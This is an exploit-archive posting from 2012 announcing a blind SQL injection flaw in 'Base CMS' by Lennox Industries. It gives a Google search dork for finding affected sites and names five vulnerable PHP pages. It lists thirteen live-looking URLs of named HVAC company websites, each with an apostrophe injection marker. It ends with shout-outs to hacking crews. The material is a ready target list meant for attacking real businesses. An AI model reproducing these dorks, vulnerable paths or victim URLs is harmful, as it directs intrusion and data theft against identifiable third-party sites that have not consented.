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Base CMS Lennox Industries SQL Injection

Posted on 24 January 2012

[ Base Content Management System Lennox Industries - Blind SQL Injection Vulnerability ] #[~] Author : the_cyber_nuxbie #[~] Home : www.thecybernuxbie.com #[~] E-mail : staff@thecybernuxbie.com #[~] Auto-Tools : SQL Manual + h*v*j. #[~] Google Dork : inurl:"/products-sub.php?id=" - Files Vuln: ../products-sub.php?id=[ Your Skill SQLi ] ../specials.php?id=[ Your Skill SQLi ] ../services.php?id=[ Your Skill SQLi ] ../resources.php?id=[ Your Skill SQLi ] ../aboutus.php?id=[ Your Skill SQLi ] - Example Target Category: http://www.albemarleheating.net/products-sub.php?id=114' [SQLi] http://www.markemeacham.com/products-sub.php?id=511' [SQLi] http://www.callsouzas.com/products-sub.php?id=105' [SQLi] http://www.robertsheatandair.com/products-sub.php?id=113' [SQLi] http://www.norcoha.com/products-sub.php?id=111' [SQLi] http://www.prudentialhvac.com/products-sub.php?id=128' [SQLi] http://www.wayneshvac.com/products-sub.php?id=500' [SQLi] http://www.comfortrightdayornight.com/products-sub.php?id=455' [SQLi] http://www.myattandbates.com/products-sub.php?id=112' [SQLi] http://www.myattandbates.com/specials.php?id=85' [SQLi] http://www.albemarleheating.net/services.php?id=560' [SQLi] http://www.markemeacham.com/aboutus.php?id=101' [SQLi] http://www.albemarleheating.net/resources.php?id=104' [SQLi] [x] N0T35: 0day no more... "n0 d0rk f0r k1dd10ts" - Thanks To All Exploiters From Indonesian: Akatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel, eidelweiss, Flyff666, Gendenk, gunslinger_, h4ntu, h010ng, IbnuSina, irvian, Jack, k1ngk0n9, k1tk4t, k4mtiez, K-159, kecemplungkalen, M3NW5, Mbah_Semar, mywisdom, NoGe, NTOS-Team, Oli Bekas, OoN_Boy, Pokeng, S3T4N, s4va, skulmatic, spykit, Sudden_death, team_elite, tempe_mendoan, the_day, tomplixsee, vanzay, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, Z190T, etc... - Nuxploits Security Project: [ www.thecybernuxbie.com ] <-- Learn Hack with Us...!!!